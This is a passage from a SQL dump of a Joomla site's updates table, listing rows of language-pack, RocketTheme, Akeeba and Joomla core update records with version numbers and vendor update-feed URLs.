rg/language/details3/af-ZA_details.xml','',''),(16931,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(16932,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(16933,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(16934,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(16935,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(16936,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(16937,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(16938,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(16939,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(16940,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(16941,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(16942,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(16943,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(16944,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(16945,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(16946,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(16947,3,0,'English US','','pkg_en-US','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(16948,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(16949,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(16950,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(16951,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(16952,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(16953,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(16954,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(16955,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(16956,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(16957,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(16958,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(16959,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(16960,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(16961,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(16962,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(16963,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(16964,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(16965,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(16966,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(16967,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(16968,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(16969,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(16970,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(16971,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(16972,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(16973,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(16974,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(16975,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(16976,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(16977,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(16978,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(16979,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(16980,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(16981,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(16982,57,0,'French','','pkg_fr-FR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(16983,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(16984,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(16985,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(16986,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(16987,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(16988,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(16989,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(16990,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(16991,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(16992,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(16993,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(16994,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(16995,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(16996,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(16997,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(16998,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(16999,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(17000,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(17001,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(17002,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(17003,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(17004,57,0,'English US','','pkg_en-US','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(17005,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(17006,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(17007,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(17008,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(17009,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(17010,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(17011,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(17012,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(17013,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(17014,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(17015,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(17016,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(17017,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(17018,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(17019,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(17020,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(17021,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(17022,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(17023,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(17024,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(17025,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(17026,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(17027,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(17028,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(17029,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(17030,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(17031,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.6.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-1.html',''),(17032,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17033,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17034,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17035,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-1.html',''),(17036,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17037,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17038,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17039,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17040,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-1.html',''),(17041,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17042,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17043,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17044,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-1.html',''),(17045,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17046,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17047,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17048,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17049,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-1.html',''),(17050,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17051,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17052,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17053,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17054,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-1.html',''),(17055,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(17056,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(17057,3,0,'French','','pkg_fr-FR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(17058,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(17059,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(17060,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(17061,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(17062,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(17063,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(17064,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(17065,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(17066,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(17067,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(17068,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(17069,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(17070,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(17071,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(17072,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(17073,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(17074,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(17075,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(17076,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(17077,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(17078,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(17079,3,0,'English US','','pkg_en-US','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(17080,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(17081,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(17082,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(17083,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(17084,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(17085,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(17086,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(17087,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(17088,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(17089,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(17090,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(17091,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(17092,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(17093,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(17094,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(17095,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(17096,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(17097,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(17098,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(17099,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(17100,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(17101,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(17102,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(17103,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(17104,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(17105,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(17106,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(17107,57,0,'French','','pkg_fr-FR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(17108,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(17109,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(17110,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(17111,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(17112,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(17113,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(17114,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(17115,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(17116,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(17117,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(17118,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(17119,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(17120,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(17121,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(17122,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(17123,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(17124,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(17125,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(17126,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(17127,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(17128,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(17129,57,0,'English US','','pkg_en-US','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(17130,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(17131,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(17132,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(17133,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(17134,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(17135,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(17136,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(17137,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(17138,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(17139,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(17140,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(17141,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(17142,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(17143,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(17144,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(17145,57,0,'Dari 